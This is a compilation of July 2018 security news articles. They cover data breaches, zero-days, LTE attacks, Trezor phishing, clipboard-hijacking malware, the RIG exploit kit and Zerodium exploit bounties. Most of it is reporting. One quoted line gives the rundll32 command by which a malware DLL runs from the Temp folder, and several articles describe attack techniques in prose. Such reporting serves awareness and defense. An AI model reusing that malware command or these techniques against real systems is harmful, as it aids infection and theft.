3.7.2018 securityweek 
Social

Facebook on Monday started notifying 800,000 users affected by a bug that resulted in blocked individuals getting temporarily unblocked. The social media giant also detailed some new API restrictions designed to better protect user information.

When you block someone on Facebook, you prevent them from seeing your posts, starting conversations on Messenger, or adding you as a friend. However, a Facebook and Messenger bug introduced in May 29 and addressed on June 5 led to users being able to see some of the content posted by individuals who had blocked them.

According to Facebook Chief Privacy Officer Erin Egan, blocked users could not see content shared only with friends, but they may have been shown content shared with “friends of friends.” The blockee may have also been able to contact the blocker via Messenger.

Egan clarified that friend connections were not reinstated as a result of the bug and 83 percent of impacted users had only one blocked person temporarily unblocked. Affected users will see a notification in their account.

New API restrictions and changes

Facebook also announced on Monday additional measures taken following the Cambridge Analytica incident, in which personal data on tens of millions of users was improperly shared with the British political consultancy through an app.

The social media giant previously shared some information on the steps taken to better protect elections and user data, and it has now announced new changes affecting application developers.

Developers have been informed that several APIs have been or will be deprecated, including the Graph API Explorer App, Profile Expression Kit, Trending API, the Signal tool, Trending Topics, Hashtag Voting, Topic Search, Topic Insights, Topic Feed, and Public Figure. The Trending and Topic APIs are part of the Media Solutions toolkit.

Some APIs will be deprecated – including due to low usage – while others will be restricted.

Developers will once again be allowed to search for Facebook pages via the Pages API, but they will need Page Public Content Access permissions, which can only be obtained via the app review process.

As for marketing tools, Facebook announced that the Marketing API can only be used by reviewed apps, and that it’s introducing new app review permissions for the Live Video and Lead Ads Retrieval APIs.


Microsoft revealed that 2 Zero-Days found in March were part of a cyber weapon in an early development stage
3.7.2018 securityaffairs
Vulnerebility

Microsoft published technical details of 2 zero-days that have been recently discovered after someone uploaded a weaponized PDF file to VirusTotal.
Security researchers from Microsoft have published technical details of two zero-day vulnerabilities that have been recently discovered after someone uploaded a weaponized PDF file to VirusTotal.

The two issues were addressed by Microsoft with May 2018 Patch Tuesday before threat actors used it in attacks in the wild.

The first zero-day vulnerability is a remote code execution flaw in Adobe Acrobat and Reader (CVE-2018-4990), the second one is a privilege escalation flaw in Microsoft Windows (CVE-2018-8120).

“The first exploit attacks the Adobe JavaScript engine to run shellcode in the context of that module. The second exploit, which does not affect modern platforms like Windows 10, allows the shellcode to escape Adobe Reader sandbox and run with elevated privileges from Windows kernel memory. ESET provided an analysis of the exploitation routines in the sample PDF.” reads the analysis published by Microsoft.

Microsoft shared the technical details of both the flaw only now because it gave users enough time to update their operating systems and Adobe software.

In late March, experts at ESET analyzed a malicious PDF file that was uploaded on VirusTotal and provided it to the Microsoft security team.

The experts flagged the document “as a potential exploit for an unknown Windows kernel vulnerability.”

The analysis conducted by the Microsoft team revealed that the document includes two different zero-day exploits, one for Adobe Acrobat and Reader and one for Microsoft Windows.

zero-days

According to Microsoft, the weaponized PDF file was in the early development stage, the code used by attackers appeared a PoC code and the weaponized file did not deliver a malicious payload.

“Although the PDF sample was found in VirusTotal, we have not observed actual attacks perpetrated using these exploits. The exploit was in early development stage, given the fact that the PDF itself did not deliver a malicious payload and appeared to be proof-of-concept (PoC) code.” reads the analysis published by Microsoft.

Someone combined the two zero-days to build a very powerful attack vector.

The Adobe Acrobat and Reader exploit is included in the document as a specially crafted JPEG 2000 image that contains the JavaScript exploit code used to trigger a double-free vulnerability in the software to run shellcode.

zero-days

The attackers were trying to chain this exploit with the second Windows kernel exploit to break the Adobe Reader sandbox and run it with elevated privileges.

Once the attacker has exploited the Adobe Reader vulnerability, he will leverage the Window zero-day flaw to escape the sandbox. The Microsoft Win32k zero-day allows the attacker to elevate the privilege of the PE file to run, which is run in kernel mode, escaping the Adobe Acrobat/Reader sandbox and gaining system-level access.

The PoC payload used in the sample dropped an empty vbs file in the Startup folder.

“Initially, ESET researchers discovered the PDF sample when it was uploaded to a public repository of malicious samples. The sample does not contain a final payload, which may suggest that it was caught during its early development stages.” concluded ESET.

“Even though the sample does not contain a real malicious final payload, the author(s) demonstrated a high level of skills in vulnerability discovery and exploit writing.”

Both Microsoft and ESET published technical details of the two zero-days, both firms also shared the IoCs for the exploits.


NSA began deleting all call detail records (CDRs) acquired since 2015
3.7.2018 securityaffairs BigBrothers

NSA is deleting hundreds of millions of records of phone calls and text messages dating back to 2015 due to technical irregularities.
The US National Security Agency announced it is deleting hundreds of millions of records of phone calls and text messages dating back to 2015 due to technical irregularities in some data received from telecommunications service providers.

“Consistent with NSA’s core values of respect for the law, accountability, integrity, and transparency we are making public notice that on May 23, 2018, NSA began deleting all call detail records (CDRs) acquired since 2015 under Title V of the Foreign Intelligence Surveillance Act (FISA)” reads the announcement published by the NSA.

“NSA is deleting the CDRs because several months ago NSA analysts noted technical irregularities in some data received from telecommunications service providers. “

Title V of the Foreign Intelligence Surveillance Act (FISA) and the USA Freedom Act of 2015 allow the intelligence agencies to collect call metadata related to certain types of calls involving persons of interest whom activity may pose a threat to the homeland security.

The National Security Agency received more call detail records (CDRs) that it was allowed to retain under the current law framework.

The NSA decided to destroy the data because it was infeasible to identify and isolate properly produced data

“Consequently, NSA, in consultation with the Department of Justice and the Office of the Director of National Intelligence, decided that the appropriate course of action was to delete all CDRs. NSA notified the Congressional Oversight Committees, the Privacy and Civil Liberties Oversight Board, and the Department of Justice of this decision.” continues the announcement.

The National Security Agency started to delete malformed CDRs on May 23, this year, more than a month ago.

NSA

The intelligence Agency also confirmed to have addressed the root cause of the problem for future CDR acquisitions.

The National Security Agency reported the problem to the Congressional Oversight Committees, the Privacy and Civil Liberties Oversight Board, and the Department of Justice that notified it to the Foreign Intelligence Surveillance Court.

This isn’t the first time that such kind of incident occurs, civil liberties journalist Marcy Wheeler published last year a catalog for all the times the National Security Agency had violated FISA since the Stellar Wind phone dragnet went under FISA in 2004.


Researchers Create Attacks That Compromise LTE Data Communication
2.7.2018 securityweek Attack

Newly devised attacks on the Long Term Evolution (LTE) high-speed wireless standard break the confidentiality and privacy of communication, a team of researchers claim.

In a newly published paper (PDF), researchers from Ruhr-University Bochum and New York University Abu Dhabi present a set of attacks against LTE’s data link layer (layer two) protocols, which could be used to identify mobile users within a cell, learn what websites the user visits, and even modify the message payload.

A stealthy attacker, the researchers say, could perform an identity mapping attack and map the user’s temporary network identity (TMSI) to the temporary radio identity (RNTI). Both pieces of information are previously unknown to the attacker but are both contained in the radio packets.

“More specifically, we demonstrate how an attacker can precisely localize and identify a user within the cell, distinguish multiple transmission streams, and use this information as a stepping stone for subsequent attacks,” the researchers note.

Using common paging techniques, the researchers were also able to identify and localize specific users for a pre-known TMSI within the cell. This, however, requires the use of an active interface, meaning that the attack becomes detectable.

The researchers also demonstrate that, even for encrypted transmissions, plaintext information up to the Packet Data Convergence Protocol (PDCP) can be accessed, thus de-anonymizing connections otherwise considered secure due to encryption.

Targeting TOR with their website fingerprinting attack, the researchers revealed that information leaks in the metadata of a connection could be used to distinguish between different websites. They also demonstrated how website fingerprinting can be mapped to LTE layer two attacks.

Although they achieved a high success rate with such an attack, the researchers explain that the experiments were performed on a closed LTE network completely under their control and on a small set of websites.

In addition to these passive attacks, the researchers devised an active attack on LTE’s layer two protocols. Called ALTER, it “exploits the missing integrity protection of LTE user data to perform a chosen-ciphertext attack,” affects all LTE devices and has implications up to the application layer, the research paper reads.

For this attack scenario, the researchers used a malicious relay within the vicinity of the user, which intercepts DNS requests from the mobile device and uses a manipulation mask to change the original IP address to that of the malicious DNS server.

The request is then forwarded to the commercial network, which sends it to the malicious server, and an additional manipulation in the downlink path ensures that the source IP address matches the target, thus rendering the attack undetected.

The attack, however, poses several challenges, such as luring the user into connecting to the malicious relay and maintaining a stable radio connection, and identifying the DNS requests and responses among the transmitted packets. Packet manipulation is another issue an attacker would face.

After testing the ALTER attack in a real-world setup, the researchers determined it is a feasible assault scenario. By forwarding all messages between the user device and the network, the malicious relay remains undetectable. The attack, the researchers claim, is possible despite the LTE Authentication and Key Agreement (AKA) being formally proven secure.

“While lots of research effort in LTE security focuses on the physical and network layers, the data link layer has remained unexplored until now. […] Based on our findings, we urgently demand the implementation of effective countermeasures in the upcoming 5G specification to assure the security and privacy of future mobile communication,” the paper concludes.


Massive Breach at Data Broker Exactis Exposes Millions of Americans
2.7.2018 securityweek  Incindent

Security Researcher Vinny Troia has discovered another sensitive database exposed on the internet. This one uses Elasticsearch, which allows easy data searching over the internet. Elasticsearch offers security including authentication and role-based access control -- but not all customers deploy it.

Troia was interested in Elasticsearch security and used Shodan to find U.S. Elasticsearch databases visible on the internet. According to a report in Wired, he found around 7,000. One stood out -- a database owned by Florida-based data broker firm Exactis and containing personal data on both consumers and businesses.

What makes this discovery exceptional was the sheer size of the database, the sensitivity of the content, and the complete lack of security. Precise details are difficult to ascertain, and Exactis has not been forthcoming with details. However, it appears to contain something like 340 million records (230 million on consumers and 110 million on business contacts); making it a far bigger potential breach than last year's Equifax breach.

The Exactis website claims the firm has consumer data on 218 million individuals and 110 million households. Eight-eight million have email addresses and matching postal addresses, and 112 million include residential phone numbers. Business data includes 21 million companies, 40 million postal addresses, 21 million records with email addresses and matching postal address, and 52 million with business phone numbers.

How much of this was exposed is not known, but it is potentially everything. It doesn't include social security numbers or payment details, but goes into great detail for each individual, including interests, habits and the age and gender of children. It apparently includes more than 400 variables ranging from religion, pets, whether a person smokes, to personal interests.

Troia reported his findings to both Exactis and the FBI; and the database is no longer accessible. However, there is no way of knowing whether anyone other than Troia also located and accessed the data. While Exactis sells this data to businesses to help compile compelling and personalized marketing campaigns, in the hands of cyber criminals the same data could equally be used to compile compelling and personalized phishing campaigns. Any hope that cyber criminals don't use Shodan in the same way and to the same effect as Troia is unfounded.

Robert Capps, VP and Authentication Strategist for NuData Security comments, "If U.S. citizens did not think their personal information has ever been compromised, this should convince them it definitely is. This latest breach blows up the 2018 tab with 230-million records exposed in just one incident."

Chris Olson, CEO of The Media Trust, believes that government must now take a lead. "Data providers need to keep in mind that they are prime targets for cybercriminals who want to commit identity theft and have tools to find databases on publicly accessible servers. While we have yet to find out whether the data they have exposed on a public server has been misappropriated by malicious actors, the scope of and negligence behind this leak could prompt greater demand among already wary U.S. consumers for stronger regulations around data privacy like the EU's GDPR. Such regulations would restrict how personal data is not only stored but used in the U.S."

Carl Wright, chief revenue officer for AttackIQ, holds a similar view. "When a breach such as this occurs, it reinforces the need for government to hold these organizations accountable to the individuals impacted. This will be the only way to ensure that corporations take the necessary steps to secure consumer data. Corporations and government entities must be required to continuously prove that their cyber security protections are able to defeat or detect attackers."

This already happens in Europe with the EU's General Data Protection Regulation (GDPR). It seems to be beginning in the U.S. Yesterday, California Gov. Jerry Brown signed the California Consumer Privacy Act of 2018 (Assembly Bill 375).

"With GDPR now in full effect," comments Richard Henderson, global security strategist at Absolute, "I've been expecting legislation such as this to start to reach consumer-focused states in the US for some time. Other states like New York and Massachusetts will likely follow suit and draft their own citizen-friendly data rights laws. Many individual states will not sit on their hands waiting for a federal initiative that may never come."

The California Act will not come into effect until the beginning of 2020 -- but it will undoubtedly make firms like Exactis re-evaluate what they do, how they do it, and how they secure it. The legislation says, for example, "The bill would require a business to make disclosures about the information and the purposes for which it is used. The bill would grant a consumer the right to request deletion of personal information and would require the business to delete upon receipt of a verified request, as specified."

Meanwhile, 'victims' of the Exactis breach are not waiting for the new law. A proposed class action was lodged in the Florida federal court on Thursday, claiming that Exactis made no attempt to follow best practice guidelines to protect the data. "Despite these well-publicized Senate and other expert reports, defendant failed to heed the recommendations, and inexplicably left its server -- and the personal information which rested thereon -- vulnerable and available to even the most basic cyberattack," claims the suit. It asserts negligence, unjust enrichment claims, and claims under Florida's Deceptive and Unfair Trade Practices Act, and seeks compensatory, punitive, and exemplary damages.

Referring to the California Act, Henderson adds, "I think we are on the threshold of a new period of customer-focused data protections. State and local governments have waited a long time for organizations to take care of this, and based on the colossal number of breaches and rampant digital thefts that continue to occur, they've had enough."


Facebook App Exposed Data of 120 Million Users
2.7.2018 securityweek 
Social

A recently addressed privacy bug on Nametests.com resulted in the data of over 120 million users who took personality quizzes on Facebook to be publicly exposed.

Patched as part of Facebook’s Data Abuse Bounty Program, the vulnerability resided in Nametests.com serving users’ data to any third-party that requested it, something that shouldn’t normally happen.

Facebook launched its Data Abuse Bounty Program in April, as part of its efforts to improve user privacy following the Cambridge Analytica scandal. The company also updated its terms on privacy and data sharing, but also admitted to tracking people over the Internet, even those who are not Facebook users.

The issue in Nametests.com was reported by Inti De Ceukelaire, who discovered that, when loading a personality test, the website would fetch all of his personal information from http://nametests.com/appconfig_user and display it on the page.

Websites shouldn’t normally be allowed to access the information, as web browsers do prevent such behavior. The data requested from Nametests.com, however, was wrapped in JavaScript, meaning that it could be shared with other websites.

“Since NameTests displayed their user’s personal data in JavaScript file, virtually any website could access it when they would request it,” the researcher explains.

To verify that this was indeed happening, he set up a website that connected to Nametests.com and would fetch information about the visitor. The access token provided by Nametests.com could also be used to gain access to the visitor’s posts, photos and friends, depending on the permissions granted.

“It would only take one visit to our website to gain access to someone’s personal information for up to two months,” De Ceukelaire says.

Another issue the researcher discovered was that the user information would continue to be exposed even after they deleted the application. With no log out functionality available, users would have had to manually delete the cookies on their devices to prevent their data from being leaked.

The bug was reported to Facebook’s Data Abuse program on April 22 and a fix was rolled out by June 25, when the researcher noticed that third-parties could no longer access visitors’ personal information as before.

The vulnerability could “have affected Facebook information people shared with nametests.com. To be on the safe side, we revoked the access tokens for everyone on Facebook who has signed up to use this app. So people will need to re-authorize the app in order to continue using it,” Facebook said.

The social platform also donated $8,000 (they apparently doubled the $4,000 bounty because the researcher chose to donate it to charity) to the Freedom of the Press foundation.

“I also got a response from NameTests. The public relations team claims that, according to the data and knowledge they have, they found no evidence of abuse by a third party. They also state that they have implemented additional tests to find such bugs and avoid them in the future,” the researcher notes.


Two Arrested for Hacking 700,000 Accounts
2.7.2018 securityweek  Crime

Russian law enforcement this week said two individuals were arrested for compromising accounts of loyalty program members from popular websites.

The unnamed cybercriminals allegedly compromised around 700,000 accounts from companies such as PayPal, Ulmart, Biglion, KupiKupon, Groupon, and others. They are also said to have put 2,000 of these accounts up for sale for $5 each.

“The detainees admitted on the spot that they had earned at least 500,000 rubles. However, the real amount of damage remains to be determined,” Group-IB, which aided with the investigation, says.

The hackers’ activity stirred interest in November 2015, after the website of a large online store fell to a large-scale cyber-attack in which the personal accounts of the store’s loyalty program members were compromised. Miscreants compromised around 120,000 accounts within a month.

The investigators discovered that the attackers “had collected compromised account information from various Internet services on hacker forums and used special programs to automatically guess passwords of accounts on the website of the online store.”

The miscreants relied on people’s habit of reusing the same login/password on multiple websites. If the logins and passwords were used on the targeted websites, the hackers would access those personal accounts.

The cybercriminals would check the accumulated bonuses on each account and would sell them on hacker forums at $5 per account or 20-30% of the nominal balance of the accounts. The buyers could then abuse the accounts to pay for products with the bonuses.

The hackers, Group-IB says, weren’t only selling compromised accounts, but also offered services for hijacking accounts: they would change the phone number and e-mail on the accounts of the online store. Such services were offered at a price of 10% of the bonus balance on the account.

To hide their tracks, the attackers used anonymizers, launched the attacks from different IP addresses, and also changed the digital fingerprint of the browser (User-Agent). Overall, they sent authorization requests from more than 35,000 unique IP addresses.

Large retailers started checking all orders with payment bonuses in early 2016, which determined the hackers to target lesser-known online stores.

“In addition, the hackers began to work on tips—information about new online stores with bonus programs and coupon services where it was possible to access personal accounts, for which the attackers promised to pay up to 50% of the amount received from the further sale of the compromised accounts,” Group-IB reports.

The leader in these attacks was a resident of Ryazan Region, born in 1998. His partner, born in 1997, who provided technical support for their joint online store, resided in Astrakhan Region.

During a search, investigators seized evidence of the group’s unlawful activities, along with narcotics. The suspects have confessed to the crimes but the investigation is still ongoing.


Typeform Data Breach Hits Many Organizations
2.7.2018 securityweek  Incindent

Typeform, a Spain-based software-as-a-service (SaaS) company that specializes in online forms and surveys, has suffered a security breach that resulted in the data collected by its customers getting stolen.

According to a notice posted on its website, Typeform identified the breach on June 27 and addressed its cause roughly half an hour later. The company says an attacker has managed to download a backup file dated May 3 from one of its servers.

The compromised file stored names, email addresses and other pieces of information submitted by users through Typeform forms. Data collected after May 3, payment information, and passwords are not impacted, Typeform said.

UK-based mobile banking service Monzo is one of the impacted organizations. Monzo says the breach affects roughly 20,000 individuals, a vast majority of which only had their email address exposed. However, in some cases, information such as postcode, name of the old bank, Twitter username, university, city, age and salary range, and employer was also compromised. Monzo says it has ended its relationship with Typeform following the incident.

The Tasmanian Electoral Commission was also hit by this breach. The organization notes that while some of the stolen data is already public, the attacker may have also obtained names, addresses, email addresses, and dates of birth submitted by electors when applying for an express vote at recent elections.

The list of organizations that has notified customers of the Typeform breach also includes Thriva, Birdseye, HackUPC, and Ocean Protocol.

Typeform last year claimed to have 30,000 paying customers and many more using its free service. Companies such as Apple, Uber, Facebook, Adobe, Airbnb, WeTransfer and BBC are also said to have used its services at some point. The company’s website currently lists Trello, HubSpot, Indiegogo, Forbes, and Freshdesk as customers.

Typeform has assured customers that it has identified and addressed the source of the breach. The company claims it has initiated a comprehensive review of its system security and is taking “significant measures” to prevent such incidents from occurring in the future.

However, shortly after the data breach was disclosed, one Twitter user claimed to have identified another vulnerability in Typeform systems.


Vulnerabilities Patched in VMware ESXi, Workstation, Fusion
2.7.2018 securityweek 
Vulnerebility

VMware informed customers last week that it patched several vulnerabilities that can lead to a denial-of-service (DoS) condition or information disclosure in its ESXi, Workstation, and Fusion products.

VMware described the flaws as out-of-bounds read issues in the shader translator component. An attacker with regular user privileges can exploit the security holes to obtain information or crash virtual machines.

The vulnerabilities, classified as “important,” are tracked as CVE-2018-6965, CVE-2018-6966 and CVE-2018-6967. A Tencent ZhanluLab researcher who uses the online moniker “RanchoIce” has been credited for reporting the flaws to VMware. A researcher from Cisco Talos independently discovered CVE-2018-6965.

According to VMware, the flaws impact ESXi 6.7 and Workstation 14.x running on any platform, and Fusion 10.x running on OS X. Patches and updates have been released for each of the affected products.

Cisco Talos has published an advisory containing technical details for CVE-2018-6965. The company has assigned a CVSS score of 6.5 to this vulnerability, which puts it near the “high severity” range.

“A specially crafted pixel shader can cause a read access violation resulting in, at least, denial of service. An attacker can provide a specially crafted shader file (either in binary or text form) to trigger this vulnerability. This vulnerability can be triggered from VMware guest and VMware host, which will be affected (leading to vmware-vmx.exe process crash on host),” Talos wrote in its advisory.

“In short, it is possible to create a shader in such a way that it will cause invalid pointer calculation. The pointer is later used for read memory operations. This causes access violation due to the pointer being invalid, which results in a denial of service, but could potentially be turned into an information disclosure vulnerability,” Talos added.


Trezor users targeted by phishing attacks, experts blame DNS Poisoning or BGP Hijacking
2.7.2018 securityaffairs
Phishing

The maintainers of the Trezor multi-cryptocurrency wallet service reported a phishing attack against some of its users that occurred during the weekend.

TREZOR

@TREZOR
· 1 Jul
Replying to @TREZOR
More details will be published soon in the form of a blog post.

Carsten
@Carsten71071425
I had some issues yesterday, when accessing your site. It seems to be related with DNS. Is http://beta-wallet.trezor.io legit?

1:13 PM - Jul 1, 2018
1
See Carsten's other Tweets
Twitter Ads info and privacy
The attack appears more complex respect a simple phishing campaign, hackers may have powered a DNS poisoning attack or a BGP hijacking to redirect users to a rogue phishing site that mimic the legitimate one.

“DNS poisoning or BGP hijacking point toward DNS poisoning or BGP hijacking” explains the Trezor team.

Hackers redirected legitimate traffic for the official wallet.trezor.io domain to a rogue copy of the website.

The team launched an investigation to shed the light on the attack. The experts spotted the incident after users reported HTTPS certificate error while landing on web wallet portal.

The error alerted the users, this kind of error suggests users are visiting a rogue website that attempts to pose as a legitimate one.

The users quickly reported the anomaly to the team of maintainers that confirmed the phishing attack and published a security advisory to warn users about the phishing attacks.

“Late night yesterday, our Support Team started receiving inquiries about an invalid SSL certificate, which serves as a stamp of authenticity of our web services. This can happen for a few reasons, some of which are less serious. Unfortunately, after investigating these reports closer, we found out that the invalid certificate warning appeared because of phishing attempts against Trezor users.” reads the security advisory.

“The fake Trezor Wallet website was served to some users who attempted to access wallet.trezor.io — the legitimate address. We do not yet know which attack vector was used, but the signs point toward DNS poisoning or BGP hijacking.”

The company also reported two other issues for the bogus website:

The first issue was an error message that was different from the original Trezor site, which told users that syncing data their Trezor hardware wallet and their Trezor web account had failed.
Trezor error message

The second issue was that the fake website was asking users to provide a copy of their “recovery seed,” Trezor warns that users should never enter the recovery seed on a PC or app. If the attackers obtain the recovery seed they can take over the accounts.
The company took down the malicious website with the support of the hosting provider.

slush
@slushcz
"At this moment, the fake Wallet has been taken down by the hosting provider. However, you should remain vigilant and report all suspicious sites. It is possible that this attack method will be used repeatedly in the future."https://blog.trezor.io/psa-phishing-alert-fake-trezor-wallet-website-3bcfdfc3eced …

5:43 PM - Jul 1, 2018

[PSA] Phishing Alert: Fake Trezor Wallet website – TREZOR Blog
Late night yesterday, our Support Team started receiving inquiries about an invalid SSL certificate, which serves as a stamp of…

blog.trezor.io
101
75 people are talking about this
Twitter Ads info and privacy
At the time it is not clear if the attackers stole user funds.

Let’s close with suggestions provided by the company:

So how should I recognize the original Trezor Wallet?
Look for the “Secure” sign in your browser’s address bar. If the certificate is invalid, your browser will warn you, and you should heed the warning. (Make sure you are accessing the correct URL: wallet.trezor.io)
Always verify all operations on your Trezor device. You should only trust the device display and what is written on it. For other sources of information, always maintain a healthy amount of skepticism.
Thirdly, never divulge sensitive or private data to anyone. This includes us at SatoshiLabs. We will never ask you for your recovery seed. Wallet will never ask you for your recovery seed. Only your device may, but it will do so securely.


A sample of CryptoCurrency Clipboard Hijackers monitors 2.3 Million Bitcoin addresses
2.7.2018 securityaffairs Cryptocurrency

A sample of CryptoCurrency Clipboard Hijackers discovered this week by BleepingComputer monitors for more than 2.3 million addresses.
Almost any people that have to send cryptocurrency coins use to copy the recipient wallet address into memory from one application and use it to make the transaction.

Crooks’ interest in cryptocurrency continues to grow and new malware was specifically designed to recognize wallet addresses in the memory of infected computers and use it for fraudulent activities, such as the hijacking of transactions.

This family of malware is called CryptoCurrency Clipboard Hijackers, the malware monitors the Windows clipboard for cryptocurrency addresses, and if one is detected, it then replaces the address in the clipboard with the attacker’s one.

With this simple trick when the user pastes the address he will send the coins to the attacker.

In March, researchers at Palo Alto Networks discovered a malware dubbed ComboJack that is able of detecting when users copy a cryptocurrency address and alter clipboards to steal cryptocurrencies and payments. In June experts from Qihoo 360 Total Security spotted a new malware campaign spreading a clipboard hijacker, tracked as ClipboardWalletHijacker, that infected over 300,000 computers, most of the victims are located in Asia, mainly China.
What is the peculiarity of a sample of cryptocurrency clipboard hijackers recently discovered by researchers at Bleeping Computer?

While most of the previous samples monitored for 400-600 thousand cryptocurrency addresses, the sample discovered this week by BleepingComputer monitors for more than 2.3 million cryptocurrency addresses.

CryptoCurrency Clipboard Hijackers

The following video shows how CryptoCurrency Clipboard Hijackers replace cryptocurrency addresses found within the Windows clipboard.

The only way to prevent such kind of attacks is double-checking the pasted address.

The infection was associated with the recent campaign that targeted Windows computers with so-called All-Radio 4.27 Portable malware package.

CryptoCurrency Clipboard Hijackers infection

“If your computer is suddenly displaying the above program, then your computer is infected with malware that installs rootkits, miners, information-stealing Trojans, and a program that is using your computer to send out spam.” reads a post published by BleepingComputer.

Once the malicious code is installed, a DLL named d3dx11_31.dll will be downloaded to the Windows Temp folder and an autorun called “DirectX 11” will be created to run the library everytime a user logs into the computer.

“This DLL will be executed using rundll32.exe with the “rundll32 C:\Users\[user-name]\AppData\Local\Temp\d3dx11_31.dll,includes_func_runnded” command.”

As usual, let me suggest using an up to date antivirus solution to detect and neutralize these threats.


RIG Exploit Kit operators leverage PROPagate Injection Technique to deliver Miner
2.7.2018 securityaffairs
Exploit

FireEye reported the PROPagate code injection technique that was observed for the first time in a malware distribution campaign in the wild.
Security experts from FireEye have documented the PROPagate code injection technique that was observed for the first time in a malware distribution campaign in the wild.

The PROPagate code injection technique was first discovered in November 2017 by a Hexacorn security researcher that demonstrated it works on all recent Windows versions and could allow attackers to inject malicious code into other applications.

The expert discovered that it is possible to abuse legitimate GUI window properties (UxSubclassInfo and CC32SubclassInfo) utilized internally by SetWindowSubclass function to load and execute malicious code inside other applications.

Back then, a security researcher found that an attacker could abuse the SetWindowSubclass API, a function of the Windows operating system that manages GUIs, to load and execute malicious code inside the processes of legitimate apps.

Malware authors took several months to adopt the PROPagate code injection technique in a live malware campaign.

Recently the experts at FireEye uncovered a campaign leveraging RIG Exploit Kit delivering Monero miner via the PROPagate code injection technique.

The operators of the RIG exploit kit are hijacking traffic from legitimate sites using a hidden iframe and redirects them to a page hosting the exploit kit. The RIG exploit kit uses three JavaScripts snippets, each of which uses a different technique to deliver the malicious payload. Thre three techniques spread the malware:

via malicious JavaScript;
via Flash;
via Visual Basic script;
Below the attack chain described by FireEye:

“The attack chain starts when the user visits a compromised website that loads the RIG EK landing page in an iframe. The RIG EK uses various techniques to deliver the NSIS (Nullsoft Scriptable Install System) loader, which leverages the PROPagate injection technique to inject shellcode into explorer.exe.” reads the analysis published by FireEye.

“This shellcode executes the next payload, which downloads and executes the Monero miner. “

PROPagate injection technique

The analysis of the payload allowed the experts to determine that threat actors have used multiple payloads and anti-analysis techniques to bypass the analysis environment.

PROPagate code injection

“Although we have been observing a decline in Exploit Kit activity, attackers are not abandoning them altogether.” In this blog post, we explored how RIG EK is being used with various exploits to compromise endpoints. We have also shown how the NSIS Loader leverages the lesser known PROPagate process injection technique, possibly in an attempt to evade security products.” concluded FireEye.


Zerodium offers up to $500,000 for Linux Zero-Day exploits
1.7.2018 securityaffairs
Exploit

The sale of Zero-day exploits is a prolific business, zero-day broker Zerodium offers rewards of up to $500,000 FreeBSD, OpenBSD, NetBSD, Linux Zero-Days.
The sale of Zero-day exploits is a prolific business that most people totally ignore, to better understand its evolution let’s analyze together the offer of the popular exploit broker Zerodium. To have a clear idea about the company mission let’s visit the website.

“ZERODIUM pays premium bounties and rewards to security researchers to acquire their original and previously unreported zero-day research affecting major operating systems, software, and devices.” reads the company web sites. “While the majority of existing bug bounty programs accept almost any kind of vulnerabilities and PoCs but pay very low rewards, at ZERODIUM we focus on high-risk vulnerabilities with fully functional exploits, and we pay the highest rewards on the market.”

Zerodium, like other zero-day brokers, buys zero-days and sell them to government agencies and law enforcement, but many privacy advocates fear that these flaws could be used by surveillance firms that sell their products to authoritarian regimes.

The company is offering rewards of up to $500,000 for zero-day exploits in UNIX-based operating systems, including OpenBSD, FreeBSD, NetBSD. The same offer is for exploits developed form popular Linux distros such as Ubuntu, CentOS, Debian, and Tails.

Prices for zero-day vary for several factors, including the market shares of the affected platforms/systems (Windows zero-day exploits for Windows are usually more valuable than Linux ones) and level of user interaction requested for the exploitation of the flaws (no click, one click, two clicks, etc.).

Other factors include the reliability for the zero-day exploit, the number of vulnerabilities that attackers need to chain to exploit the flaw, the success rate, and the OS configuration that it is necessary for the exploitation.

The rewards for Linux zero-days continues to increase, a trend already observed since February, when rewards going as high as $45,000.
zerodium Zero-day exploits

Zerodium

@Zerodium
We're currently acquiring #0day exploits (privilege escalation or RCE) for the following operating systems: OpenBSD, FreeBSD, NetBSD, Ubuntu, CentOS, Debian, and Tails. For related inquiries or submissions, contact us: https://zerodium.com/submit.html

6:17 PM - Jun 27, 2018
51
39 people are talking about this
Twitter Ads info and privacy
The company shared the latest zero-day acquisition drive as part of its ordinary zero-day acquisition program.

The acquisition drive includes special offers, usually associated with higher fees, for specific zero-day exploits.

Zerodium is still looking for remote code execution or local privilege escalation Linux and BSD systems, it offers variable rewards that can go up to $500,000.

The firm payouts for Linux privilege escalation zero-day exploits range from $10,000 to $30,000, while a local privilege escalation (LPE) in Linux could be paid up to $100,000.

Rewards for Linux remote code execution exploits can range from $50,000 to $500,000, zero-days for CentOS and Ubuntu are most wanted.

Across the months, Zerodium published several drive searching for zero-day exploits targeting iOS, Adobe Flash Player, the Tor Browser, mobile IM apps, and Android.

zerodium Zero-day exploits

In the past Zerodium offered up to $1.5 million for an iOS zero-day exploit.

Looking at the price-list for zero-days we can notice that exploit codes for server environments, Linux have high rewards, but mobile exploits remain the most expensive in the zero-day market.

Recently a new player emerged in the zero-day market, it is Crowdfense who launched an acquisition program with prizes of $10 million.


Security issues in the LTE standard expose billions on mobile users to attacks
1.7.2018 securityaffairs Attack

Security issues in the LTE mobile device standard could be exploited by persistent attackers to spy on users’ cellular networks and hijack data traffic.
A team of from Ruhr-Universität Bochum and New York University Abu Dhabi has discovered some security issues in the LTE mobile device standard that could be exploited by persistent attackers (i.e. intelligence agencies, well-funded groups) to spy on users’ cellular networks, eavesdrop communications, hijack their data traffic.

LTE mobile telephony standard is currently used by billions of people worldwide, compared to other standards it includes many security improvements.

The experts devised surveillance techniques that allowed them to identify people within a phone tower radio cell, spy on their traffic, and redirect them to rogue websites by tampering with DNS lookups.

The researchers demonstrated three attack scenarios that target the data link layer of Long-Term Evolution networks, also known as LTE or 4G.

“Our security analysis of the mobile communication standard LTE ( Long-Term Evolution, also know as 4G) on the data link layer (so-called layer two) has uncovered three novel attack vectors that enable different attacks against the protocol.” reads the analysis published by the experts.

“On the one hand, we introduce two passive attacks that demonstrate an identity mapping attack and a method to perform website fingerprinting. On the other hand, we present an active cryptographic attack called aLTEr attack that allows an attacker to redirect network connections by performing DNS spoofing due to a specification flaw in the LTE standard.”

This data link layer lies on top of the physical channel, that maintains the wireless transmission of information between the users and the network. Layer two define the way multiple users can access the resources of the network, helps to correct transmission errors, and implement data protection through encryption.

Researchers distinguished between passive and active attack techniques, the former include identification and website snooping techniques, the latter is the webpage redirection attack.

The identification and website snooping techniques could allow attackers to spy on users by listening to what’s going out over the airwaves from phones, whereas the webpage redirection attack could be conducted by an attacker that sets up a malicious cell tower to tamper with transmissions.

The experts dubbed the DNS spoofing attack “aLTEr” and described it with this statement.

